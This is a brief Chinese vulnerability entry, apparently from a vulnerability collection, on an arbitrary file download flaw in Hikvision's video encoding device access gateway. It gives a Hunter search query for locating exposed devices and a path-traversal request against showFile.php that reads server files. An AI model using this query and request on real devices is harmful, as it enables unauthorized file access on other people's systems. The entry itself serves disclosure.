海康威视视频编码设备接入网关 showFile.php 任意文件下载漏洞
一、漏洞简介
海康威视视频接入网关系统在页面/serverLog/showFile.php的参数fileName存在任意文件下载漏洞
二、影响版本
- HIKVISION 视频编码设备接入网关
三、资产测绘
- hunter:
web.title="视频编码设备接入网关"&&app.name=="Hikvision 海康威视视频编码设备接入网关"
- 登录页面
四、漏洞复现
/serverLog/showFile.php?fileName=../web/html/main.php